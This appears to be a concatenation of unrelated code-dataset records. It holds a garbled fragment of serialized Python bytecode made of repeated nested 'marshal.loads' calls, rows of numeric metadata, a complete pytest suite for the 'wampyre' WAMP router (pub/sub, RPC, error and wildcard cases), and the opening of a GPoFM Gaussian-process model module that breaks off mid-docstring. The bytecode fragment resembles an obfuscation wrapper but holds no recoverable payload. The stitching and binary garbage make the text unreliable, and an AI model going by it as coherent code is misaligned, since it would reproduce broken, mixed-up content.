0\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01(\x02\x00\x00\x00t\x07\x00\x00\x00marshalt\x05\x00\x00\x00loads(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00<tegarid>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x02\x00\x00\x00\x0c\x01'))
| 76,399.333333
| 229,182
| 0.755295
| 51,642
| 229,198
| 3.352058
| 0.009295
| 0.58729
| 0.557135
| 0.529615
| 0.982895
| 0.980925
| 0.978066
| 0.976067
| 0.974282
| 0.972058
| 0
| 0.406013
| 0.000768
| 229,198
| 2
| 229,183
| 114,599
| 0.34984
| 0
| 0
| 0
| 0
| 3
| 0.788558
| 0.786019
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 19
|
b602e0acc2d3a5a19b09ac08ef3a7c954abaa5cc
| 18,572
|
py
|
Python
|
src/wampyre/tests/test_session.py
|
JohnDoee/wampire
|
37c3bc6c30a97520addad6e0d2e74014dba77d6a
|
[
"MIT"
] | 1
|
2018-07-04T18:44:46.000Z
|
2018-07-04T18:44:46.000Z
|
src/wampyre/tests/test_session.py
|
JohnDoee/wampire
|
37c3bc6c30a97520addad6e0d2e74014dba77d6a
|
[
"MIT"
] | 1
|
2018-11-23T03:59:44.000Z
|
2018-11-23T03:59:44.000Z
|
src/wampyre/tests/test_session.py
|
JohnDoee/wampire
|
37c3bc6c30a97520addad6e0d2e74014dba77d6a
|
[
"MIT"
] | null | null | null |
import pytest
from ..opcodes import OP
from ..pattern import Pattern
from ..realm import realm_manager
from ..session import STATE_CLOSED, STATE_UNAUTHENTICATED
from ..transports.base import TransportBase
def transport_base():
    """Build a fresh in-memory transport test double.

    Returns an instance of a ``TransportBase`` subclass that records every
    outgoing frame instead of writing to a network, so tests can pop and
    inspect replies.  Tests reach into the private attributes ``_sends``,
    ``_closed``, ``_last_id`` and ``_method_uri_allowed`` directly, so those
    names are part of the (test-local) contract.
    """
    class TestTransportBase(TransportBase):
        def __init__(self):
            self._sends = []  # recorded (opcode, args) frames, oldest first
            self._closed = False  # flipped by close_session()
            self._last_id = 0  # counter backing generate_id()
            # Authorization hook; tests replace it to deny specific URIs.
            self._method_uri_allowed = lambda method, uri: True
            super().__init__()
        def send(self, opcode, *args):
            # Capture instead of transmitting; inspected via get_reply().
            self._sends.append((opcode, args))
        def realm_allowed(self, realm):
            # Any realm whose name contains "realm_deny" is rejected
            # (exercised by test_inaccessible_realm).
            return "realm_deny" not in realm
        def close_session(self):
            self._closed = True
        def set_state(self, state):
            self.session.state = state
        def get_reply(self):
            # NOTE(review): pops from the END of the buffer, i.e. returns the
            # most recent frame rather than FIFO order — tests rely on this.
            return self._sends.pop()
        def is_empty(self):
            return not self._sends
        def generate_id(self):
            # Deterministic, monotonically increasing request ids.
            self._last_id += 1
            return self._last_id
        def connect(self, realm):
            # Convenience: perform the HELLO handshake and return the reply.
            self.receive(OP.HELLO, realm, {})
            return self.get_reply()
        def disconnect(self):
            self.session.close_session()
        def method_uri_allowed(self, method, uri):
            return self._method_uri_allowed(method, uri)
    return TestTransportBase()
@pytest.fixture
def transport():
    """Yield a fresh transport double; wipe the shared realm registry afterwards."""
    instance = transport_base()
    yield instance
    realm_manager.realms = {}
@pytest.fixture
def transport2():
    """Second independent transport double; cleans the realm registry on teardown."""
    instance = transport_base()
    yield instance
    realm_manager.realms = {}
@pytest.fixture
def transport3():
    """Third independent transport double; cleans the realm registry on teardown."""
    instance = transport_base()
    yield instance
    realm_manager.realms = {}
def test_hello_goodbye(transport):
    """HELLO must be answered with WELCOME; GOODBYE must be echoed back."""
    transport.receive(OP.HELLO, "a.realm", {})
    op, payload = transport.get_reply()
    assert op == OP.WELCOME
    assert Pattern("id", "dict")(*payload)
    transport.receive(OP.GOODBYE, {}, "wamp.close.goodbye_and_out")
    op, payload = transport.get_reply()
    assert op == OP.GOODBYE
    assert Pattern("dict", "uri!")(*payload)
def test_subscribe_unsubscribe(transport, transport2, transport3):
    """Full pub/sub lifecycle across three peers in one realm.

    Covers: publish with no subscribers, SUBSCRIBE acks, EVENT fan-out to
    multiple subscribers, UNSUBSCRIBE acks, no delivery after unsubscribe,
    and PUBLISHED acknowledgements when {"acknowledge": True} is set.
    """
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport3.connect("a.realm")
    # Publish with no subscribers: nothing is delivered anywhere.
    transport.receive(
        OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["a"], {"b": "c"}
    )
    assert transport.is_empty()
    assert transport2.is_empty()
    assert transport3.is_empty()
    # transport2 subscribes; SUBSCRIBED echoes the request id and carries
    # the router-assigned subscription id.
    transport2.receive(OP.SUBSCRIBE, transport2.generate_id(), {}, "a.topic")
    opcode, args = transport2.get_reply()
    assert opcode == OP.SUBSCRIBED
    assert Pattern("id", "id")(*args)
    assert transport2._last_id == args[0]
    transport2_a_topic_subscription_id = args[1]
    # Publish from transport: only transport2 (the subscriber) gets an EVENT.
    transport.receive(
        OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["a"], {"b": "c"}
    )
    opcode, args = transport2.get_reply()
    assert opcode == OP.EVENT
    assert Pattern("id", "id", "dict", "list", "dict")(*args)
    assert args[0] == transport2_a_topic_subscription_id
    assert args[3] == ["a"]
    assert args[4] == {"b": "c"}
    assert transport.is_empty()
    assert transport2.is_empty()
    assert transport3.is_empty()
    # transport3 joins the same topic; a publish from transport2 fans out to
    # both subscribers (publishers also receive their own events here).
    transport3.receive(OP.SUBSCRIBE, transport3.generate_id(), {}, "a.topic")
    opcode, args = transport3.get_reply()
    assert opcode == OP.SUBSCRIBED
    transport3_a_topic_subscription_id = args[1]
    transport2.receive(
        OP.PUBLISH, transport2.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
    )
    opcode, args = transport2.get_reply()
    assert opcode == OP.EVENT
    assert Pattern("id", "id", "dict", "list", "dict")(*args)
    assert args[0] == transport2_a_topic_subscription_id
    assert args[3] == ["b"]
    assert args[4] == {"c": "d"}
    opcode, args = transport3.get_reply()
    assert opcode == OP.EVENT
    assert Pattern("id", "id", "dict", "list", "dict")(*args)
    assert args[0] == transport3_a_topic_subscription_id
    assert args[3] == ["b"]
    assert args[4] == {"c": "d"}
    assert transport.is_empty()
    assert transport2.is_empty()
    assert transport3.is_empty()
    # transport2 unsubscribes; subsequent publishes reach only transport3.
    transport2.receive(
        OP.UNSUBSCRIBE, transport2.generate_id(), transport2_a_topic_subscription_id
    )
    opcode, args = transport2.get_reply()
    assert opcode == OP.UNSUBSCRIBED
    assert Pattern("id")(*args)
    assert transport2._last_id == args[0]
    transport2.receive(
        OP.PUBLISH, transport2.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
    )
    opcode, args = transport3.get_reply()
    assert transport.is_empty()
    assert transport2.is_empty()
    assert transport3.is_empty()
    # transport3 unsubscribes too; now the publish is delivered to nobody.
    transport3.receive(
        OP.UNSUBSCRIBE, transport3.generate_id(), transport3_a_topic_subscription_id
    )
    opcode, args = transport3.get_reply()
    assert opcode == OP.UNSUBSCRIBED
    assert Pattern("id")(*args)
    assert transport3._last_id == args[0]
    transport2.receive(
        OP.PUBLISH, transport2.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
    )
    assert transport.is_empty()
    assert transport2.is_empty()
    assert transport3.is_empty()
    # Re-subscribe and publish with acknowledge=True: the publisher gets a
    # PUBLISHED ack and the subscriber still receives the EVENT.
    transport3.receive(OP.SUBSCRIBE, transport3.generate_id(), {}, "a.topic")
    opcode, args = transport3.get_reply()
    assert opcode == OP.SUBSCRIBED
    transport3_a_topic_subscription_id = args[1]
    transport.receive(
        OP.PUBLISH, transport.generate_id(), {"acknowledge": True}, "a.topic", ["b"]
    )
    opcode, args = transport.get_reply()
    assert opcode == OP.PUBLISHED
    assert Pattern("id", "id")(*args)
    assert transport._last_id == args[0]
    opcode, args = transport3.get_reply()
    assert opcode == OP.EVENT
    assert Pattern("id", "id", "dict", "list")(*args)
    assert args[0] == transport3_a_topic_subscription_id
    assert args[3] == ["b"]
    assert transport.is_empty()
    assert transport2.is_empty()
    assert transport3.is_empty()
def test_register_call_yield(transport, transport2, transport3):
    """End-to-end RPC round trip: REGISTER -> CALL -> INVOCATION -> YIELD -> RESULT.

    transport registers "a.procedure", transport2 calls it, and transport3
    registers an unrelated procedure to prove it is never invoked.
    """
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport3.connect("a.realm")
    transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
    opcode, args = transport.get_reply()
    assert opcode == OP.REGISTERED
    assert Pattern("id", "id")(*args)
    assert transport._last_id == args[0]
    assert transport.is_empty()
    transport_register_id = args[1]
    # BUG FIX: the request id for transport3's REGISTER was generated from
    # `transport`'s counter instead of transport3's own; each peer must use
    # its own id sequence.
    transport3.receive(OP.REGISTER, transport3.generate_id(), {}, "a.procedure.2")
    opcode, args = transport3.get_reply()
    transport2.receive(
        OP.CALL, transport2.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
    )
    assert transport2.is_empty()
    # The registered callee receives an INVOCATION referencing its registration.
    opcode, args = transport.get_reply()
    assert opcode == OP.INVOCATION
    assert Pattern("id", "id", "dict", "list", "dict")(*args)
    assert transport.is_empty()
    assert args[1] == transport_register_id
    assert args[3] == ["a"]
    assert args[4] == {"b": "c"}
    # Callee yields a result; the router relays it to the caller as RESULT.
    transport.receive(OP.YIELD, args[0], {}, ["c"], {"d": "e"})
    assert transport.is_empty()
    assert transport3.is_empty()
    opcode, args = transport2.get_reply()
    assert opcode == OP.RESULT
    assert transport2._last_id == args[0]
    assert args[2] == ["c"]
    assert args[3] == {"d": "e"}
    assert transport.is_empty()
    assert transport2.is_empty()
    assert transport3.is_empty()
def test_inter_realm_communication(transport, transport2):
    """A publish in one realm must never reach a subscriber in another realm."""
    transport.connect("a.realm")
    transport2.connect("another.realm")
    transport2.receive(OP.SUBSCRIBE, transport2.generate_id(), {}, "a.topic")
    _opcode, _args = transport2.get_reply()  # drain the SUBSCRIBED ack
    transport.receive(
        OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["a"], {"b": "c"}
    )
    for peer in (transport, transport2):
        assert peer.is_empty()
def test_failed_register_unregister(transport, transport2):
    """Error paths for REGISTER/UNREGISTER.

    Covers: duplicate registration by the same peer, duplicate registration
    by another peer, unregistering someone else's registration, a successful
    unregister, and unregistering twice.
    """
    transport.connect("a.realm")
    transport2.connect("a.realm")
    # First registration succeeds.
    transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
    opcode, args = transport.get_reply()
    assert opcode == OP.REGISTERED
    assert Pattern("id", "id")(*args)
    assert transport._last_id == args[0]
    assert transport.is_empty()
    transport_register_id = args[1]
    # Same peer registering the same URI again is rejected.
    transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
    opcode, args = transport.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.REGISTER
    assert args[3] == "wamp.error.procedure_already_exists"
    assert transport.is_empty()
    # A different peer registering the taken URI is rejected too.
    transport2.receive(OP.REGISTER, transport2.generate_id(), {}, "a.procedure")
    opcode, args = transport2.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.REGISTER
    assert args[3] == "wamp.error.procedure_already_exists"
    assert transport2.is_empty()
    # A peer cannot unregister a registration it does not own.
    transport2.receive(OP.UNREGISTER, transport2.generate_id(), transport_register_id)
    opcode, args = transport2.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.UNREGISTER
    assert args[3] == "wamp.error.no_such_registration"
    assert transport2.is_empty()
    # The owner can unregister.
    transport.receive(OP.UNREGISTER, transport.generate_id(), transport_register_id)
    opcode, args = transport.get_reply()
    assert opcode == OP.UNREGISTERED
    assert Pattern("id")(*args)
    assert args[0] == transport._last_id
    assert transport.is_empty()
    # Unregistering again fails: the registration is gone.
    transport.receive(OP.UNREGISTER, transport.generate_id(), transport_register_id)
    opcode, args = transport.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.UNREGISTER
    assert args[3] == "wamp.error.no_such_registration"
    assert transport.is_empty()
def test_failed_mixed_unsubscribe(transport, transport2):
    """UNSUBSCRIBE error paths: wrong owner and double unsubscribe."""
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport.receive(OP.SUBSCRIBE, transport.generate_id(), {}, "a.topic")
    opcode, args = transport.get_reply()
    transport_a_topic_subscription_id = args[1]
    # Another peer cannot unsubscribe using transport's subscription id.
    transport2.receive(
        OP.UNSUBSCRIBE, transport2.generate_id(), transport_a_topic_subscription_id
    )
    opcode, args = transport2.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.UNSUBSCRIBE
    assert args[3] == "wamp.error.no_such_subscription"
    assert transport2.is_empty()
    # The owner unsubscribes successfully.
    transport.receive(
        OP.UNSUBSCRIBE, transport.generate_id(), transport_a_topic_subscription_id
    )
    opcode, args = transport.get_reply()
    assert opcode == OP.UNSUBSCRIBED
    assert Pattern("id")(*args)
    assert transport.is_empty()
    # A second unsubscribe of the same id fails: it no longer exists.
    transport.receive(
        OP.UNSUBSCRIBE, transport.generate_id(), transport_a_topic_subscription_id
    )
    opcode, args = transport.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.UNSUBSCRIBE
    assert args[3] == "wamp.error.no_such_subscription"
    assert transport.is_empty()
def test_call_invocation_error(transport, transport2):
    """An ERROR answered to an INVOCATION is relayed to the caller as a CALL error."""
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
    opcode, args = transport.get_reply()
    transport2.receive(
        OP.CALL, transport2.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
    )
    # Callee receives the INVOCATION; args[0] is the invocation request id.
    opcode, args = transport.get_reply()
    # Callee refuses the invocation with an application-defined error URI.
    transport.receive(
        OP.ERROR,
        OP.INVOCATION,
        args[0],
        {},
        "a.procedure.error.no_happy_time",
        ["a"],
        {"b": "c"},
    )
    # The router forwards the error to the caller, rewritten as a CALL error
    # that echoes the caller's original request id.
    opcode, args = transport2.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri", "list", "dict")(*args)
    assert args[0] == OP.CALL
    assert args[1] == transport2._last_id
    assert args[3] == "a.procedure.error.no_happy_time"
    assert transport2.is_empty()
def test_call_unknown(transport):
    """Calling an unregistered procedure yields wamp.error.no_such_procedure."""
    transport.connect("a.realm")
    transport.receive(
        OP.CALL, transport.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
    )
    op, payload = transport.get_reply()
    assert op == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*payload)
    assert payload[0] == OP.CALL
    assert payload[1] == transport._last_id
    assert payload[3] == "wamp.error.no_such_procedure"
    assert transport.is_empty()
def test_call_connection_lost(transport, transport2):
    """If the callee disconnects mid-call, the caller gets wamp.error.callee_lost."""
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport.receive(OP.REGISTER, transport.generate_id(), {}, "a.procedure")
    opcode, args = transport.get_reply()
    transport2.receive(
        OP.CALL, transport2.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
    )
    # The callee drops before yielding a result.
    transport.disconnect()
    opcode, args = transport2.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.CALL
    # BUG FIX: the echoed request id belongs to transport2's CALL; the
    # original asserted against transport._last_id, which only passed
    # because both counters happened to be at 1.
    assert args[1] == transport2._last_id
    assert args[3] == "wamp.error.callee_lost"
    assert transport2.is_empty()
def test_connection_lost_unregister_disable_calls(transport, transport2):
    """A disconnect must tear down the peer's registrations and subscriptions."""
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport2.receive(OP.REGISTER, transport2.generate_id(), {}, "a.procedure")
    opcode, args = transport2.get_reply()
    transport2.receive(OP.SUBSCRIBE, transport2.generate_id(), {}, "a.topic")
    opcode, args = transport2.get_reply()
    # transport2 drops; its procedure and subscription must vanish.
    transport2.disconnect()
    transport.receive(
        OP.CALL, transport.generate_id(), {}, "a.procedure", ["a"], {"b": "c"}
    )
    opcode, args = transport.get_reply()
    assert opcode == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*args)
    assert args[0] == OP.CALL
    assert args[1] == transport._last_id
    assert args[3] == "wamp.error.no_such_procedure"
    assert transport.is_empty()
    # Publishing to the orphaned topic must not blow up (no assertions —
    # reaching the end without an exception is the check).
    transport.receive(
        OP.PUBLISH, transport.generate_id(), {}, "a.topic", ["b"], {"c": "d"}
    )
def test_invalid_opcodes_syntaxes(transport):
    """Protocol violations must ABORT and close the session.

    Three violations are exercised: a REGISTER with a malformed argument
    list, an unknown opcode (500000), and a second HELLO on an already
    established session.
    """
    assert transport.session.state == STATE_UNAUTHENTICATED
    transport.connect("a.realm")
    # REGISTER missing its options dict: malformed message.
    transport.receive(OP.REGISTER, transport.generate_id(), "a.bogus.procedure")
    opcode, args = transport.get_reply()
    assert opcode == OP.ABORT
    assert Pattern("dict", "uri!")(*args)
    assert args[1] == "wamp.error.protocol_violation"
    assert transport.is_empty()
    assert transport.session.state == STATE_CLOSED
    # Unknown opcode.
    transport.connect("a.realm")
    transport.receive(500000, transport.generate_id(), "a.bogus.procedure")
    opcode, args = transport.get_reply()
    assert opcode == OP.ABORT
    assert Pattern("dict", "uri!")(*args)
    assert args[1] == "wamp.error.protocol_violation"
    assert transport.is_empty()
    assert transport.session.state == STATE_CLOSED
    # HELLO while already joined.
    transport.connect("a.realm")
    transport.receive(OP.HELLO, "a.realm", {})
    opcode, args = transport.get_reply()
    assert opcode == OP.ABORT
    assert Pattern("dict", "uri!")(*args)
    assert args[1] == "wamp.error.protocol_violation"
    assert transport.is_empty()
    assert transport.session.state == STATE_CLOSED
def test_inaccessible_realm(transport):
    """Connecting to a denied realm is aborted with wamp.error.no_such_realm."""
    op, payload = transport.connect("a.realm_deny")
    assert op == OP.ABORT
    assert Pattern("dict", "uri!")(*payload)
    assert payload[1] == "wamp.error.no_such_realm"
    assert transport.is_empty()
    assert transport.session.state == STATE_CLOSED
def test_uri_denied(transport):
    """An authorizer veto yields wamp.error.not_authorized; allowed URIs succeed."""
    transport.connect("a.realm")
    # Only "b.topic" passes the authorization hook from here on.
    transport._method_uri_allowed = lambda method, uri: uri == "b.topic"
    transport.receive(OP.SUBSCRIBE, transport.generate_id(), {}, "a.topic")
    op, payload = transport.get_reply()
    assert op == OP.ERROR
    assert Pattern("opcode", "id", "dict", "uri!")(*payload)
    assert payload[0] == OP.SUBSCRIBE
    assert payload[3] == "wamp.error.not_authorized"
    assert transport.is_empty()
    transport.receive(OP.SUBSCRIBE, transport.generate_id(), {}, "b.topic")
    op, payload = transport.get_reply()
    assert op == OP.SUBSCRIBED
    assert Pattern("id", "id")(*payload)
    assert transport._last_id == payload[0]
def test_subscribe_wildcard(transport, transport2, transport3):
    """A wildcard subscription ("a..topic") receives events for matching topics."""
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport3.connect("a.realm")
    transport.receive(
        OP.SUBSCRIBE, transport.generate_id(), {"match": "wildcard"}, "a..topic"
    )
    opcode, args = transport.get_reply()
    assert opcode == OP.SUBSCRIBED
    assert Pattern("id", "id")(*args)
    assert transport._last_id == args[0]
    transport_a_topic_subscription_id = args[1]
    # BUG FIX: the PUBLISH request ids below are now generated by the
    # publishing peer (transport2); the original drew them from transport's
    # counter, inflating the wrong id sequence.
    transport2.receive(
        OP.PUBLISH, transport2.generate_id(), {}, "a.good.topic", ["a"], {"b": "c"}
    )
    # The wildcard subscriber gets the EVENT, with the concrete topic in details.
    opcode, args = transport.get_reply()
    assert opcode == OP.EVENT
    assert Pattern("id", "id", "dict", "list", "dict")(*args)
    assert args[0] == transport_a_topic_subscription_id
    assert args[2] == {"topic": "a.good.topic"}
    assert args[3] == ["a"]
    assert args[4] == {"b": "c"}
    transport.receive(
        OP.UNSUBSCRIBE, transport.generate_id(), transport_a_topic_subscription_id
    )
    opcode, args = transport.get_reply()
    assert opcode == OP.UNSUBSCRIBED
    assert Pattern("id")(*args)
    assert transport._last_id == args[0]
    # After unsubscribing, matching publishes are no longer delivered.
    transport2.receive(
        OP.PUBLISH, transport2.generate_id(), {}, "a.good.topic", ["a"], {"b": "c"}
    )
    assert transport.is_empty()
def test_register_wildcard(transport, transport2, transport3):
    """A wildcard registration ("a..procedure") receives calls for matching URIs."""
    transport.connect("a.realm")
    transport2.connect("a.realm")
    transport3.connect("a.realm")
    transport.receive(
        OP.REGISTER, transport.generate_id(), {"match": "wildcard"}, "a..procedure"
    )
    opcode, args = transport.get_reply()
    assert opcode == OP.REGISTERED
    assert Pattern("id", "id")(*args)
    assert transport._last_id == args[0]
    assert transport.is_empty()
    transport_register_id = args[1]
    # BUG FIX: transport3's REGISTER request id must come from transport3's
    # own counter, not transport's.
    transport3.receive(OP.REGISTER, transport3.generate_id(), {"match": "prefix"}, "a")
    opcode, args = transport3.get_reply()
    transport2.receive(
        OP.CALL, transport2.generate_id(), {}, "a.cool.procedure", ["a"], {"b": "c"}
    )
    assert transport2.is_empty()
    # The wildcard registrant is invoked; details carry the concrete procedure.
    opcode, args = transport.get_reply()
    assert opcode == OP.INVOCATION
    assert Pattern("id", "id", "dict", "list", "dict")(*args)
    assert transport.is_empty()
    assert args[1] == transport_register_id
    assert args[2] == {"procedure": "a.cool.procedure"}
    assert args[3] == ["a"]
    assert args[4] == {"b": "c"}
    # The prefix registrant (transport3) must not have been invoked.
    assert transport3.is_empty()
| 32.411867
| 86
| 0.654803
| 2,261
| 18,572
| 5.209642
| 0.05617
| 0.046693
| 0.046354
| 0.064522
| 0.866287
| 0.846591
| 0.811105
| 0.783513
| 0.761185
| 0.740301
| 0
| 0.014324
| 0.191794
| 18,572
| 572
| 87
| 32.468531
| 0.77042
| 0
| 0
| 0.71116
| 0
| 0
| 0.088251
| 0.026707
| 0
| 0
| 0
| 0
| 0.431072
| 1
| 0.065646
| false
| 0
| 0.013129
| 0.008753
| 0.09628
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3749f59a1f30b7b20cfed75a48005fff681711ff
| 9,648
|
py
|
Python
|
GPoFM/models/GPoNNet.py
|
MaxInGaussian/GPoFM
|
b7ddfa3361f7e55fb4ca29a2355f4b860bb90e9c
|
[
"BSD-3-Clause"
] | 4
|
2017-12-08T07:51:23.000Z
|
2020-08-02T16:47:04.000Z
|
GPoFM/models/GPoNNet.py
|
MaxInGaussian/GPoFM
|
b7ddfa3361f7e55fb4ca29a2355f4b860bb90e9c
|
[
"BSD-3-Clause"
] | null | null | null |
GPoFM/models/GPoNNet.py
|
MaxInGaussian/GPoFM
|
b7ddfa3361f7e55fb4ca29a2355f4b860bb90e9c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
GPoFM: Gaussian Process Training with
Optimized Feature Maps for Shift-Invariant Kernels
Github: https://github.com/MaxInGaussian/GPoFM
Author: Max W. Y. Lam [maxingaussian@gmail.com]
"""
import sys, os, string, time
import numpy as np
import numpy.random as npr
from theano import tensor as TT
from . import Model
__all__ = [
"GPoReLU",
"GPoTanh",
"GPoMax",
]
class GPoReLU(Model):
    '''
    The :class:`GPoReLU` class implements a GPoFM model:
    Gaussian process Optimizing Rectifier Feature Maps (GPoReLU)

    Parameters
    ----------
    nfeats : an integer
        Number of Neurons
    penalty : a float
        Penalty for prevention of overfitting
    transform : a bool
        Indicator that determines whether to transform the data before training
    X_trans : a string
        Transformation method used for inputs of training data
    y_trans : a string
        Transformation method used for outputs of training data
    verbose : a bool
        Indicator that determines whether to print training messages or not
    '''
    # Class-level defaults; populated per instance by the Model base class.
    setting, compiled_funcs = None, None
    def __init__(self, nfeats, resolution=0.5, penalty=1., transform=True, **args):
        super(GPoReLU, self).__init__(nfeats, resolution, penalty, transform, **args)
    def __str__(self):
        return "GPoReLU (%d, %.2f, %.2f)"%(self.setting['nfeats'], self.setting['resolution'], self.setting['penalty'])
    def randomized_params(self):
        """Draw a random initial parameter list [const, l, f, p(, lm)]."""
        S = self.setting['nfeats']
        const = npr.randn(2)*1e-2   # (a, b): noise/signal variance pre-activations
        l = npr.randn(self.D)       # per-dimension log lengthscales
        f = npr.randn(self.D*S)     # spectral frequencies, flattened (D, S)
        p = 2*np.pi*npr.rand(S)     # phases in [0, 2*pi)
        rand_params = [const, l, f, p]
        if(self.setting['transform']):
            # Extra exponents for the input/output power transforms.
            lm = 2*np.pi*npr.rand(self.D+1)
            rand_params.append(lm)
        return rand_params
    def feature_maps(self, X, params):
        """Build the softplus (ReLU-like) feature map Phi from the flat params."""
        t_ind, S = 0, self.setting['nfeats']
        a = params[0]; t_ind += 1; b = params[1]; t_ind += 1
        sig2_n, sig2_f = 1/(1+TT.exp(a))*self.setting['resolution'], TT.exp(b)
        l = params[t_ind:t_ind+self.D]; t_ind += self.D
        f = params[t_ind:t_ind+self.D*S]; t_ind += self.D*S
        F = TT.reshape(f, (self.D, S))/np.exp(l[:, None])
        p = params[t_ind:t_ind+S]; t_ind += S
        P = TT.reshape(p, (1, S))-TT.mean(F, 0)[None, :]
        FF = TT.dot(X, F)+P
        # Softplus activation, scaled so feature variance matches sig2_f.
        Phi = TT.log(1+TT.exp(FF))*TT.sqrt(sig2_f/FF.shape[1])
        if(type(X) == TT.TensorVariable):
            return sig2_n, sig2_f, FF, Phi
        return Phi
    def transform_inputs(self, params):
        """Symbolic input transform: power transform followed by a Gaussian CDF."""
        if(not self.setting['transform']):
            return super(GPoReLU, self).transform_inputs(params)
        # BUG FIX: the original referenced undefined names `T` and `epsilon`
        # (NameError at run time); use the TT alias and a small local guard.
        epsilon = 1e-6  # numerical guard — TODO confirm intended magnitude
        sign = lambda x: TT.tanh(x*1e3)
        cdf = lambda x: .5*(1+TT.erf(x/TT.sqrt(2+epsilon)+epsilon))
        X = TT.dmatrices('X')
        X_lm = params[-(self.D+1):-1][None, :]
        X = (sign(X)*TT.sqrt(X**2)**X_lm-1)/X_lm
        return cdf(X)
    def transform_outputs(self, params, inverse=None):
        """Symbolic output transform; with `inverse`, map predictions back."""
        if(not self.setting['transform']):
            return super(GPoReLU, self).transform_outputs(params)
        sign = lambda x: TT.tanh(x*1e3)
        y_lm = params[-1]
        if(inverse is not None):
            ty = inverse*y_lm+1
            ty = sign(ty)*TT.sqrt(ty**2)**(1./y_lm)
            return ty
        y = TT.dmatrices('y')
        ty = (sign(y)*TT.sqrt(y**2)**y_lm-1)/y_lm
        # BUG FIX: the original returned the untransformed `y`, silently
        # discarding the computed `ty`.
        return ty
class GPoTanh(Model):
    '''
    The :class:`GPoTanh` class implements a GPoFM model:
    Gaussian process Optimizing Tanh Feature Maps (GPoTanh)

    Parameters
    ----------
    nfeats : an integer
        Number of Neurons
    penalty : a float
        Penalty for prevention of overfitting
    transform : a bool
        Indicator that determines whether to transform the data before training
    X_trans : a string
        Transformation method used for inputs of training data
    y_trans : a string
        Transformation method used for outputs of training data
    verbose : a bool
